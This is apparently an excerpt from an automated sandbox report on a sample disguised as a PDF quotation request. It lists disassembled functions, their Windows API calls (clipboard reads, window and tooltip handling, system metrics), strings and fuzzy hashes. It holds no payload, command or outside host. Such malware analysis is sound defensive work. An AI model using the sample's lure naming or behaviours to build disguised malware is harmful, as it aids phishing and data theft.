                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                    • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                    • IsWindowVisible.USER32(?), ref: 0045682C
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                    • GetWindowRect.USER32(?,?), ref: 00456873
                                                                    • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                    • CopyRect.USER32(?,?), ref: 004568BE
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                    • String ID: ($,$tooltips_class32
                                                                    • API String ID: 225202481-3320066284
                                                                    • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                    • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                    • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                    • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                    Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                    • String ID:
                                                                    • API String ID: 15083398-0
                                                                    • Opcode ID: c1334997229f77db4b11d19c1487f326394a263a26d39f21c0988453c07de84a
                                                                    • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                    • Opcode Fuzzy Hash: c1334997229f77db4b11d19c1487f326394a263a26d39f21c0988453c07de84a
                                                                    • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                    Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                    • GetClientRect.USER32(?,?), ref: 00471D05
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                    • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                    • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                    • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                    • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                    • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                    • String ID: @$AutoIt v3 GUI
                                                                    • API String ID: 867697134-3359773793
                                                                    • Opcode ID: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                                                    • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                    • Opcode Fuzzy Hash: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                                                    • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                    Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 1503153545-1459072770
                                                                    • Opcode ID: 652e9956a2c061bcacba314d71e92089feb5c798af4b022cd26fa76e4b483538
                                                                    • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                    • Opcode Fuzzy Hash: 652e9956a2c061bcacba314d71e92089feb5c798af4b022cd26fa76e4b483538
                                                                    • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                    Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll$__wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                    • API String ID: 790654849-32604322
                                                                    • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                    • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                    • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                    • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                    Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec4818a70940714241ac62ce087eb5378cc8c67a5392bddd4fb75b5668bfa7cd
                                                                    • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                    • Opcode Fuzzy Hash: ec4818a70940714241ac62ce087eb5378cc8c67a5392bddd4fb75b5668bfa7cd
                                                                    • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                    Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window
                                                                    • String ID: 0
                                                                    • API String ID: 2353593579-4108050209
                                                                    • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                    • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                    • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                    • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                    Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                    • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                    • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                    • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                    • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                    • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                    • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                    • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                    • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                    • GetSysColor.USER32(00000008), ref: 0044A265
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                    • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                    • String ID:
                                                                    • API String ID: 1744303182-0
                                                                    • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                    • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                    • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                    • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                    Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                    • __mtterm.LIBCMT ref: 00417C34
                                                                      • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                      • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                    • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                    • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                    • __init_pointers.LIBCMT ref: 00417CE6
                                                                    • __calloc_crt.LIBCMT ref: 00417D54
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                    • API String ID: 4163708885-3819984048
                                                                    • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                    • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                    • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                    • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                    Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll$IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2485277191-404129466
                                                                    • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                    • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                    • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                    • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                    Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                    • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                    • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                    • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                    • GetDesktopWindow.USER32 ref: 0045476F
                                                                    • GetWindowRect.USER32(00000000), ref: 00454776
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                    • GetClientRect.USER32(?,?), ref: 004547D2
                                                                    • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                    • String ID:
                                                                    • API String ID: 3869813825-0
                                                                    • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                    • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                    • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                    • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                    Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00464B28
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                    • _wcslen.LIBCMT ref: 00464C28
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                    • _wcslen.LIBCMT ref: 00464CBA
                                                                    • _wcslen.LIBCMT ref: 00464CD0
                                                                    • _wcslen.LIBCMT ref: 00464CEF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
